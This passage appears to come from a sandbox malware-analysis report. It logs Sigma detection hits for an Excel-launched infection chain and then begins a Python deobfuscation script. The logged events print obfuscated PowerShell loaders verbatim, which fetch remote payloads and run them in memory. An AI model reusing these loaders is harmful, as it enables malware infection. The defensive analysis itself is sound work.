Source: Process started | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT, ProcessId: 3112, ProcessName: powershell.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , ProcessId: 892, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline", ProcessId: 3320, ProcessName: csc.exe
                    Source: Network Connection | Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0', Tim Shelton | Data: DestinationIp: 198.244.140.41, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3552, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                    Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3976, TargetFilename: C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS
                    Source: Network Connection | Author: X__Junior (Nextron Systems) | Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3552, Protocol: tcp, SourceIp: 198.244.140.41, SourceIsIpv6: false, SourcePort: 443
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( 
$verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile 
-command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGl
yZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3976, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , ProcessId: 892, ProcessName: wscript.exe
                    Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3976, TargetFilename: C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.cmdline
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3552, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", CommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE 
-Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( 
$verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3976, TargetFilename: C:\Users\user\AppData\Local\Temp\qgk1oeyy.wdn.ps1
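The second-stage command recorded in the Sigma hits above hides its script behind substitutions that PowerShell applies at run time: the script is split into `'+'` fragments (so that even the marker tokens `0Ql` and `ifd` never appear whole on the command line), then `.Replace('0Ql','|')`, `.Replace('ifd',"'")` and `.Replace('opi','$')` are evaluated with the replacement characters spelled as `[ChAr]` codes, and the result is handed to `ieX`, assembled from the characters at index 1 and 3 of `SilentlyContinue` (the default value of `$VerbosePreference`) plus `'X'`. The Python below is an added example, not part of the Joe Sandbox report: it undoes those layers statically, names the invoker, and pulls the indicators, reversing the backwards-written stage-3 URL passed to the `VAI` method. The input is the command line above with only its outer `powershell.exe ... -command "..."` wrapper removed; the function names are the example's own.

```python
"""Static unwrapping of the stage-2 PowerShell command recorded in the Sigma hits above."""
import re

# Constructed input: the stage-2 command line from the report, with the outer
# powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command "..."
# wrapper removed. The text inside is unchanged.
STAGE2_CMD = (
    "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(("
    "'opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'"
    "+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;"
    "opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);"
    "opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);"
    "opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;"
    "opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);"
    "opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;"
    "op'+'ibase64Length = opiendIndex - opistartIndex;"
    "opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);"
    "opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];"
    "opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);"
    "opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);"
    "opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');"
    "opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, "
    "ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,"
    "ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));'"
    ").rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
)

# One .Replace() argument: a 'literal', a (parenthesised sum) or a [cast][char]N term.
_ARG = r"(?:'[^']*'|\([^()]*\)|(?:\[\w+\])+(?:0x[0-9a-f]+|\d+))"
_REPLACE = re.compile(r"\.replace\(\s*(" + _ARG + r")\s*,\s*(" + _ARG + r")\s*\)", re.I)
# The wrapped script: (('...').Replace(...
_WRAPPED = re.compile(r"\(\('(.*?)'\)\.replace\(", re.I | re.S)
_INVOKER = re.compile(r"\$verbosepreference\.tostring\(\)\[([\d,]+)\]\s*\+\s*'([^']*)'", re.I)


def ps_str(expr: str) -> str:
    """Evaluate a PowerShell string expression made of 'literals' and [char]N terms joined by +.
    Caveat: a literal that itself contains '+' is not handled; none occurs in this sample."""
    expr = expr.strip()
    if expr.startswith("(") and expr.endswith(")"):
        expr = expr[1:-1]
    out = []
    for term in expr.split("+"):
        term = term.strip()
        if term.startswith("'") and term.endswith("'"):
            out.append(term[1:-1])
        else:
            m = re.search(r"\[char\]\s*(0x[0-9a-f]+|\d+)", term, re.I)
            if not m:
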